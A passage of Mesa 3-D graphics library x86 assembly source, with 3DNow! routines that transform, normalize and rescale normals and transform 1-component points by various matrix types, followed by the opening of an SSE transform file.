PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM5 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
MOVQ ( MM4, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TNR_transform) )
FEMMS
LLBL (G3TNR_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_normals:
 * transform normals by the full 3x3 part of mat->inv -- no scale factor,
 * no normalization.
 * Register roles: EDX = in walk ptr, EAX = dest walk ptr, ECX = mat->inv,
 * EDI = counter.  MM3..MM7 cache the matrix rows across the loop.
 */
GLOBL GLNAME(_mesa_3dnow_transform_normals)
HIDDEN(_mesa_3dnow_transform_normals)
GLNAME(_mesa_3dnow_transform_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI ) /* count > 0 ?? */
JE ( LLBL (G3T_end) )
FEMMS
MOVQ ( REGIND(ECX), MM3 ) /* m1 | m0 */
MOVQ ( REGOFF(16, ECX), MM4 ) /* m5 | m4 */
MOVD ( REGOFF(8, ECX), MM5 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM5 ) /* m6 | m2 */
MOVQ ( REGOFF(32, ECX), MM6 ) /* m9 | m8 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
ALIGNTEXT32
LLBL (G3T_transform):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4...+x2*m6| x0*m0+x1*m1+x2*m2 */
MOVQ ( REGIND(EDX), MM1 ) /* x1 | x0 */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m10 */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
JNZ ( LLBL (G3T_transform) )
FEMMS
LLBL (G3T_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_normalize_normals:
 * normalize normals without any matrix transform.  With ARG_LENGTHS the
 * stored reciprocal lengths are multiplied in; without it, 1/sqrt(x.x)
 * is computed per normal via PFRSQRT + PFRSQIT1/PFRCPIT2 refinement.
 * Register roles: ECX = in walk ptr, EAX = dest walk ptr,
 * EDX = lengths ptr (or NULL), EBP = counter.
 */
GLOBL GLNAME(_mesa_3dnow_normalize_normals)
HIDDEN(_mesa_3dnow_normalize_normals)
GLNAME(_mesa_3dnow_normalize_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), ECX ) /* in->start */
MOV_L ( ARG_LENGTHS, EDX )
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3N_end) )
FEMMS
CMP_L ( CONST(0), EDX ) /* lengths == 0 ? */
JE ( LLBL (G3N_norm2) ) /* calculate lengths */
ALIGNTEXT32
LLBL (G3N_norm1): /* use precalculated lengths */
PREFETCH ( REGIND(EAX) )
MOVQ ( REGIND(ECX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | x2 */
MOVD ( REGIND(EDX), MM3 ) /* | length (x) */
PFMUL ( MM3, MM1 ) /* | x2 (normalized) */
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
ADD_L ( STRIDE, ECX ) /* next normal */
PREFETCH ( REGIND(ECX) )
PFMUL ( MM3, MM0 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM0, REGIND(EAX) ) /* write new x0, x1 */
MOVD ( MM1, REGOFF(8, EAX) ) /* write new x2 */
ADD_L ( CONST(16), EAX ) /* next r */
ADD_L ( CONST(4), EDX ) /* next length */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3N_norm1) )
JMP ( LLBL (G3N_end1) )
ALIGNTEXT32
LLBL (G3N_norm2): /* need to calculate lengths */
PREFETCHW ( REGIND(EAX) )
PREFETCH ( REGIND(ECX) )
MOVQ ( REGIND(ECX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | x2 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
ADD_L ( STRIDE, ECX ) /* next normal */
PFMUL ( MM0, MM3 ) /* x1*x1 | x0*x0 */
MOVQ ( MM1, MM4 ) /* | x2 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM1, MM4 ) /* | x2*x2 */
PFADD ( MM4, MM3 ) /* | x0*x0+x2*x2 */
PFACC ( MM3, MM3 ) /* x0*x0+...+x2*x2 | x0*x0+x1*x1+x2*x2*/
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFRCPIT2 ( MM4, MM5 ) /* Newton-Raphson refined 1/sqrt */
PFMUL ( MM5, MM0 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write new x0, x1 */
PFMUL ( MM5, MM1 ) /* | x2 (normalized) */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write new x2 */
JNZ ( LLBL (G3N_norm2) )
LLBL (G3N_end1):
FEMMS
LLBL (G3N_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_rescale_normals:
 * multiply every normal component by the scalar ARG_SCALE -- no matrix,
 * no normalization.
 * Register roles: ECX = in walk ptr, EAX = dest walk ptr, EDX = counter.
 * MM0 holds (scale | scale) across the loop.
 */
GLOBL GLNAME(_mesa_3dnow_rescale_normals)
HIDDEN(_mesa_3dnow_rescale_normals)
GLNAME(_mesa_3dnow_rescale_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDX ) /* dest->count = in->count */
MOV_L ( EDX, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), ECX ) /* in->start */
CMP_L ( CONST(0), EDX ) /* count == 0 -> done */
JE ( LLBL (G3R_end) )
FEMMS
MOVD ( ARG_SCALE, MM0 ) /* scale */
PUNPCKLDQ ( MM0, MM0 ) /* scale | scale */
ALIGNTEXT32
LLBL (G3R_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(ECX), MM1 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | x2 */
PFMUL ( MM0, MM1 ) /* x1*scale | x0*scale */
ADD_L ( STRIDE, ECX ) /* next normal */
PREFETCH ( REGIND(ECX) )
PFMUL ( MM0, MM2 ) /* | x2*scale */
ADD_L ( CONST(16), EAX ) /* next r */
MOVQ ( MM1, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM2, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDX ) /* decrement normal counter */
JNZ ( LLBL (G3R_rescale) )
FEMMS
LLBL (G3R_end):
POP_L ( ESI )
POP_L ( EDI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,765
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform1.S
|
/* $Id: 3dnow_xform1.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
/*
 * _mesa_3dnow_transform_points1_general
 *
 * Transform a vector of 1-component points by a full 4x4 matrix:
 * r = x0*row0 + row3, producing 4-component results (dest size/flags are
 * set to 4 / VEC_SIZE_4 below).  Matrix is column-major floats; m00/m01
 * live at offset 0, m02/m03 at 8, m30/m31 at 48, m32/m33 at 56.
 * Loop registers: EAX = source vertex, EDI = source stride, EDX = dest
 * vertex (16 bytes each), ESI = remaining vertex count, ECX = matrix.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_general )
HIDDEN(_mesa_3dnow_transform_points1_general)
GLNAME( _mesa_3dnow_transform_points1_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_3 ) ) /* count == 0: skip loop */
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(8, ECX), MM1 ) /* m03 | m02 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVQ ( REGOFF(56, ECX), MM3 ) /* m33 | m32 */
ALIGNTEXT16
LLBL( G3TPGR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
MOVQ ( MM4, MM5 ) /* x0 | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFMUL ( MM1, MM5 ) /* x0*m03 | x0*m02 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
PFADD ( MM3, MM5 ) /* x0*m03+m33 | x0*m02+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM5, REGOFF(8, EDX) ) /* write r3, r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_identity
 *
 * Identity transform for 1-component points: simply copies x0 from each
 * source vertex into the dest vector (dest size 1, VEC_SIZE_1 flag).
 * Loop registers: EAX = source vertex, EDI = source stride, EDX = dest
 * vertex (16 bytes each), ESI = remaining vertex count.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_identity )
HIDDEN(_mesa_3dnow_transform_points1_identity)
GLNAME( _mesa_3dnow_transform_points1_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(1), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_1), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_4) ) /* count == 0: skip loop */
ALIGNTEXT16
LLBL( G3TPIR_3 ):
MOVD ( REGIND(EAX), MM0 ) /* | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
MOVD ( MM0, REGIND(EDX) ) /* | r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_3 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_4 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_3d_no_rot
 *
 * Transform 1-component points by a 3D matrix with no rotation terms:
 * r0 = x0*m00 + m30, r1 = m31, r2 = m32 (constant per matrix).
 * Dest is marked size 3 / VEC_SIZE_3.  Loop registers: EAX = source,
 * EDI = stride, EDX = dest (16 bytes each), ESI = count.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points1_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points1_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_3 ) ) /* count == 0: skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PFMUL ( MM0, MM4 ) /* | x0*m00 */
PFADD ( MM2, MM4 ) /* m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM3, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_perspective
 *
 * Transform 1-component points by a perspective matrix:
 * r0 = x0*m00, r1 = 0 (from the zeroed high half of MM4), r2 = m32,
 * r3 = 0 (high half of MM3).  Dest is marked size 4 / VEC_SIZE_4.
 * Loop registers: EAX = source, EDI = stride, EDX = dest, ESI = count.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_perspective )
HIDDEN(_mesa_3dnow_transform_points1_perspective)
GLNAME( _mesa_3dnow_transform_points1_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_3 ) ) /* count == 0: skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* 0 | x0 */
PFMUL ( MM0, MM4 ) /* 0 | x0*m00 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM3, REGOFF(8, EDX) ) /* write r2 (=m32), r3 (=0) */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_2d
 *
 * Transform 1-component points by a 2D matrix:
 * (r1|r0) = x0*(m01|m00) + (m31|m30).  Dest is size 2 / VEC_SIZE_2.
 * Loop registers: EAX = source, EDI = stride, EDX = dest, ESI = count.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_2d )
HIDDEN(_mesa_3dnow_transform_points1_2d)
GLNAME( _mesa_3dnow_transform_points1_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3 ) ) /* count == 0: skip loop */
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_2d_no_rot
 *
 * Transform 1-component points by a 2D matrix with no rotation terms:
 * r0 = x0*m00 + m30, r1 = m31.  Dest is size 2 / VEC_SIZE_2.
 * Loop registers: EAX = source, EDI = stride, EDX = dest, ESI = count.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points1_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points1_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) ) /* count == 0: skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* | x0*m00 */
PFADD ( MM2, MM4 ) /* m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points1_3d
 *
 * Transform 1-component points by a 3D matrix:
 * (r1|r0) = x0*(m01|m00) + (m31|m30), r2 = x0*m02 + m32.
 * Dest is size 3 / VEC_SIZE_3.  Loop registers: EAX = source,
 * EDI = stride, EDX = dest, ESI = count, ECX = matrix.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_3d )
HIDDEN(_mesa_3dnow_transform_points1_3d)
GLNAME( _mesa_3dnow_transform_points1_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) ) /* dest->count = source->count */
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX ) /* dest start ptr (offset 4 -- presumably V4F_START; TODO confirm) */
MOV_L ( ESI, ECX ) /* ECX now holds the matrix ptr */
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_3 ) ) /* count == 0: skip loop */
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | m02 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
MOVQ ( MM4, MM5 ) /* | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFMUL ( MM1, MM5 ) /* | x0*m02 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
PFADD ( MM3, MM5 ) /* | x0*m02+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM5, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_3 ):
FEMMS /* leave MMX/3DNow! state */
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 14,295
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform2.S
|
/* $Id: sse_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
/*
 * _mesa_sse_transform_points2_general
 *
 * SSE transform of 2-component points by a full 4x4 matrix:
 * r = ox*row0 + oy*row1 + row3, writing 4-component results.
